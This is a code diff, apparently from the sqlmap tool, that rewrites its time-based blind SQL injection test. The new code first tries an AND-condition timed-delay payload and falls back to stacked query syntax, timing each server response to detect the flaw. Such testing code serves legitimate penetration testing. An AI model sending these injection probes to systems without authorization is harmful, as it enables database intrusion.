|
24 | 24 |
|
25 | 25 |
|
26 | 26 |
|
| 27 | +import time |
| 28 | + |
| 29 | +from lib.core.agent import agent |
27 | 30 | from lib.core.data import kb |
28 | 31 | from lib.core.data import logger |
29 | 32 | from lib.core.data import queries |
30 | 33 | from lib.core.settings import SECONDS |
31 | 34 | from lib.request import inject |
| 35 | +from lib.request.connect import Connect as Request |
32 | 36 |
|
33 | 37 |
|
34 | 38 | def timeTest(): |
35 | 39 | infoMsg = "testing time based blind sql injection on parameter " |
36 | | - infoMsg += "'%s'" % kb.injParameter |
| 40 | + infoMsg += "'%s' with AND condition syntax" % kb.injParameter |
37 | 41 | logger.info(infoMsg) |
38 | 42 |
|
39 | | - query = queries[kb.dbms].timedelay % SECONDS |
40 | | - timeTest = inject.goStacked(query, timeTest=True) |
| 43 | + timeQuery = queries[kb.dbms].timedelay % SECONDS |
| 44 | + |
| 45 | + query = agent.prefixQuery(" AND %s" % timeQuery) |
| 46 | + query = agent.postfixQuery(query) |
| 47 | + payload = agent.payload(newValue=query) |
| 48 | + start = time.time() |
| 49 | + _ = Request.queryPage(payload) |
| 50 | + duration = int(time.time() - start) |
| 51 | + |
| 52 | + if duration >= SECONDS: |
| 53 | + infoMsg = "the parameter '%s' is affected by a time " % kb.injParameter |
| 54 | + infoMsg += "based blind sql injection with AND condition syntax" |
| 55 | + logger.info(infoMsg) |
| 56 | + |
| 57 | + kb.timeTest = payload |
41 | 58 |
|
42 | | - if timeTest[0] == True: |
43 | | - kb.timeTest = timeTest[1] |
44 | 59 | else: |
45 | | - kb.timeTest = False |
| 60 | + warnMsg = "the parameter '%s' is not affected by a time " % kb.injParameter |
| 61 | + warnMsg += "based blind sql injection with AND condition syntax" |
| 62 | + logger.warn(warnMsg) |
| 63 | + |
| 64 | + infoMsg = "testing time based blind sql injection on parameter " |
| 65 | + infoMsg += "'%s' with stacked query syntax" % kb.injParameter |
| 66 | + logger.info(infoMsg) |
| 67 | + |
| 68 | + start = time.time() |
| 69 | + payload, _ = inject.goStacked(timeQuery) |
| 70 | + duration = int(time.time() - start) |
| 71 | + |
| 72 | + if duration >= SECONDS: |
| 73 | + infoMsg = "the parameter '%s' is affected by a time " % kb.injParameter |
| 74 | + infoMsg += "based blind sql injection with stacked query syntax" |
| 75 | + logger.info(infoMsg) |
| 76 | + |
| 77 | + kb.timeTest = payload |
| 78 | + else: |
| 79 | + warnMsg = "the parameter '%s' is not affected by a time " % kb.injParameter |
| 80 | + warnMsg += "based blind sql injection with stacked query syntax" |
| 81 | + logger.warn(warnMsg) |
| 82 | + |
| 83 | + kb.timeTest = False |
46 | 84 |
|
47 | 85 | return kb.timeTest |
0 commit comments